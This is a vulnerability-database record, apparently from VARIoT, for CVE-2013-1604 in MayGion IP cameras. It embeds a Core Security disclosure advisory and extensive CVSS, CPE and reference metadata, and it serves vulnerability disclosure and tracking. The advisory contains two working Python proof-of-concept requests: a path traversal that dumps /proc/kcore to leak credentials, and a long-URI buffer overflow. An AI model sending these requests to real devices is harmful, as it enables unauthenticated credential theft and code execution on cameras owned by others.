VAR-201403-0054

Vulnerability from variot - Updated: 2024-02-06 22:53

Directory traversal vulnerability in MayGion IP Cameras with firmware before 2013.04.22 (05.53) allows remote attackers to read arbitrary files via a .. (dot dot) in the default URI. MayGion IP Camera is prone to a directory-traversal vulnerability. An attacker can exploit this issue using directory-traversal strings to retrieve arbitrary files outside of the server root directory. This may aid in further attacks. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/

MayGion IP Cameras multiple vulnerabilities

  1. Advisory Information

Title: MayGion IP Cameras multiple vulnerabilities Advisory ID: CORE-2013-0322 Advisory URL: http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities Date published: 2013-05-28 Date of last update: 2013-05-28 Vendors contacted: MayGion Release mode: Coordinated release

  1. Vulnerability Information

Class: Path traversal [CWE-22], Buffer overflow [CWE-119] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1604, CVE-2013-1605

  1. [CVE-2013-1604] to dump the camera's memory and retrieve user credentials,
  2. [CVE-2013-1605] to execute arbitrary code.

  3. Vulnerable Packages

. Other firmware versions are probably affected too but they were not checked.

  1. Non-Vulnerable Packages

. H.264 ipcam firmware 2013.04.22.

  1. Credits

These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team.

  1. Technical Description / Proof of Concept Code

7.1. User Credentials Leaked via Path Traversal

[CVE-2013-1604] The following Python code exploits a path traversal and dumps the camera's memory. Valid user credentials can be extracted from this memory dump by an unauthenticated remote attacker.

/----- import httplib

conn = httplib.HTTPConnection("192.168.100.1") conn.request("GET", "/../../../../../../../../../proc/kcore") resp = conn.getresponse() data = resp.read() conn.close() -----/

7.2. Buffer overflow

[CVE-2013-1605] The following Python script can be used to trigger the vulnerability without authentication. As a result, the Instruction Pointer register (IP) will be overwritten with 0x61616161, which is a typical buffer overrun condition.

/----- import httplib

conn = httplib.HTTPConnection("192.168.100.1") conn.request("GET", "/" + "A" * 3000 + ".html") resp = conn.getresponse() data = resp.read() conn.close() -----/

  1. Report Timeline

. 2013-05-02: Core Security Technologies notifies MayGion of the vulnerabilities. Publication date is set for May 29th, 2013. 2013-05-02: Vendor asks for a report with technical information. 2013-05-03: A draft advisory containing technical details sent to MayGion team. 2013-05-03: Vendor notifies that all vulnerabilities were fixed in the last firmware version, released April 22nd, 2013. 2013-05-09: Core asks for a list of affected devices and firmware. No reply received. 2013-05-28: Advisory CORE-2013-0322 is published.

  1. References

[1] http://www.maygion.com

  1. About CoreLabs

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

  1. About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

  1. Disclaimer

The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

  1. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201403-0054",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ip camera",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "maygion",
        "version": "6.0"
      },
      {
        "model": "ip camera",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "maygion",
        "version": "05.60"
      },
      {
        "model": "ip camera",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "maygion",
        "version": "6.2"
      },
      {
        "model": "ip camera",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "maygion",
        "version": "6.1"
      },
      {
        "model": "ip camera",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "maygion",
        "version": "05.49"
      },
      {
        "model": "ip camera",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "maygion",
        "version": "05.53"
      },
      {
        "model": "ip camera",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "maygion",
        "version": "05.59"
      },
      {
        "model": "ip camera",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "maygion",
        "version": "09.27"
      },
      {
        "model": "ip camera",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "maygion",
        "version": "2013.04.22 (05.53)"
      },
      {
        "model": "ip camera",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "maygion",
        "version": "09.27"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-006252"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-612"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1604"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:maygion:ip_camera_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "09.27",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:maygion:ip_camera_firmware:05.49:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:maygion:ip_camera_firmware:05.59:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:maygion:ip_camera_firmware:05.53:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:maygion:ip_camera_firmware:6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:maygion:ip_camera_firmware:6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:maygion:ip_camera_firmware:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:maygion:ip_camera_firmware:05.60:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-1604"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Nahuel Riva and Francisco Falcon from Core Exploit Writers Team",
    "sources": [
      {
        "db": "BID",
        "id": "60192"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-612"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2013-1604",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2013-1604",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-61606",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2013-1604",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201305-612",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-61606",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2013-1604",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-61606"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1604"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-006252"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-612"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1604"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Directory traversal vulnerability in MayGion IP Cameras with firmware before 2013.04.22 (05.53) allows remote attackers to read arbitrary files via a .. (dot dot) in the default URI. MayGion IP Camera is prone to a directory-traversal vulnerability. \nAn attacker can exploit this issue using directory-traversal strings to retrieve arbitrary files outside of the server root directory. This may aid in further attacks. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nMayGion IP Cameras multiple vulnerabilities\n\n1. *Advisory Information*\n\nTitle: MayGion IP Cameras multiple vulnerabilities\nAdvisory ID: CORE-2013-0322\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\nDate published: 2013-05-28\nDate of last update: 2013-05-28\nVendors contacted: MayGion\nRelease mode: Coordinated release\n\n2. *Vulnerability Information*\n\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\nImpact: Code execution, Security bypass\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-1604, CVE-2013-1605\n\n3. [CVE-2013-1604] to dump the camera\u0027s memory and retrieve user\ncredentials,\n   2. [CVE-2013-1605] to execute arbitrary code. \n\n4. *Vulnerable Packages*\n\n   . Other firmware versions are probably affected too but they were not\nchecked. \n\n5. *Non-Vulnerable Packages*\n\n   . H.264 ipcam firmware 2013.04.22. \n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Nahuel Riva and\nFrancisco Falcon from Core Exploit Writers Team. \n\n7. *Technical Description / Proof of Concept Code*\n\n7.1. *User Credentials Leaked via Path Traversal*\n\n[CVE-2013-1604] The following Python code exploits a path traversal and\ndumps the camera\u0027s memory. Valid user credentials can be extracted from\nthis memory dump by an unauthenticated remote attacker. \n\n/-----\nimport httplib\n\nconn = httplib.HTTPConnection(\"192.168.100.1\")\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\nresp = conn.getresponse()\ndata = resp.read()\nconn.close()\n-----/\n\n7.2. *Buffer overflow*\n\n[CVE-2013-1605] The following Python script can be used to trigger the\nvulnerability without authentication. As a result, the Instruction\nPointer register (IP) will be overwritten with 0x61616161, which is a\ntypical buffer overrun condition. \n\n/-----\nimport httplib\n\nconn = httplib.HTTPConnection(\"192.168.100.1\")\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\nresp = conn.getresponse()\ndata = resp.read()\nconn.close()\n-----/\n\n8. *Report Timeline*\n\n. 2013-05-02:\nCore Security Technologies notifies MayGion of the vulnerabilities. \nPublication date is set for May 29th, 2013. 2013-05-02:\nVendor asks for a report with technical information. 2013-05-03:\nA draft advisory containing technical details sent to MayGion team. 2013-05-03:\nVendor notifies that all vulnerabilities were fixed in the last firmware\nversion, released April 22nd, 2013. 2013-05-09:\nCore asks for a list of affected devices and firmware. No reply received. 2013-05-28:\nAdvisory CORE-2013-0322 is published. \n\n9. *References*\n\n[1] http://www.maygion.com\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2013 Core Security\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-1604"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-006252"
      },
      {
        "db": "BID",
        "id": "60192"
      },
      {
        "db": "VULHUB",
        "id": "VHN-61606"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1604"
      },
      {
        "db": "PACKETSTORM",
        "id": "121787"
      }
    ],
    "trust": 2.16
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-61606",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=25813",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-61606"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1604"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-1604",
        "trust": 3.0
      },
      {
        "db": "BID",
        "id": "60192",
        "trust": 2.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "25813",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-006252",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-612",
        "trust": 0.7
      },
      {
        "db": "XF",
        "id": "20131604",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "84589",
        "trust": 0.6
      },
      {
        "db": "FULLDISC",
        "id": "20130528 CORE-2013-0322 - MAYGION IP CAMERAS MULTIPLE VULNERABILITIES",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "121787",
        "trust": 0.2
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-79467",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-61606",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1604",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-61606"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1604"
      },
      {
        "db": "BID",
        "id": "60192"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-006252"
      },
      {
        "db": "PACKETSTORM",
        "id": "121787"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-612"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1604"
      }
    ]
  },
  "id": "VAR-201403-0054",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-61606"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-02-06T22:53:25.550000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.maygion.com"
      },
      {
        "title": "firmware.2013.06.25(h.264)",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=48900"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-006252"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-612"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-61606"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-006252"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1604"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "http://www.coresecurity.com/advisories/maygion-ip-cameras-multiple-vulnerabilities"
      },
      {
        "trust": 1.9,
        "url": "http://www.securityfocus.com/bid/60192"
      },
      {
        "trust": 1.8,
        "url": "http://www.exploit-db.com/exploits/25813"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2013/may/194"
      },
      {
        "trust": 1.2,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/84589"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1604"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-1604"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/84589"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/22.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/exploits/25813/"
      },
      {
        "trust": 0.1,
        "url": "http://www.maygion.com"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1605"
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
      },
      {
        "trust": 0.1,
        "url": "http://corelabs.coresecurity.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.coresecurity.com."
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1604"
      },
      {
        "trust": 0.1,
        "url": "http://corelabs.coresecurity.com."
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-61606"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1604"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-006252"
      },
      {
        "db": "PACKETSTORM",
        "id": "121787"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-612"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1604"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-61606"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1604"
      },
      {
        "db": "BID",
        "id": "60192"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-006252"
      },
      {
        "db": "PACKETSTORM",
        "id": "121787"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-612"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1604"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-25T00:00:00",
        "db": "VULHUB",
        "id": "VHN-61606"
      },
      {
        "date": "2014-03-25T00:00:00",
        "db": "VULMON",
        "id": "CVE-2013-1604"
      },
      {
        "date": "2013-05-28T00:00:00",
        "db": "BID",
        "id": "60192"
      },
      {
        "date": "2014-03-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-006252"
      },
      {
        "date": "2013-05-28T19:22:11",
        "db": "PACKETSTORM",
        "id": "121787"
      },
      {
        "date": "2013-05-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201305-612"
      },
      {
        "date": "2014-03-25T18:21:16.637000",
        "db": "NVD",
        "id": "CVE-2013-1604"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-08-29T00:00:00",
        "db": "VULHUB",
        "id": "VHN-61606"
      },
      {
        "date": "2017-08-29T00:00:00",
        "db": "VULMON",
        "id": "CVE-2013-1604"
      },
      {
        "date": "2014-08-27T00:23:00",
        "db": "BID",
        "id": "60192"
      },
      {
        "date": "2014-03-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-006252"
      },
      {
        "date": "2014-03-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201305-612"
      },
      {
        "date": "2017-08-29T01:33:09.997000",
        "db": "NVD",
        "id": "CVE-2013-1604"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-612"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "MayGion IP Camera Directory traversal vulnerability in some firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-006252"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "path traversal",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201305-612"
      }
    ],
    "trust": 0.6
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…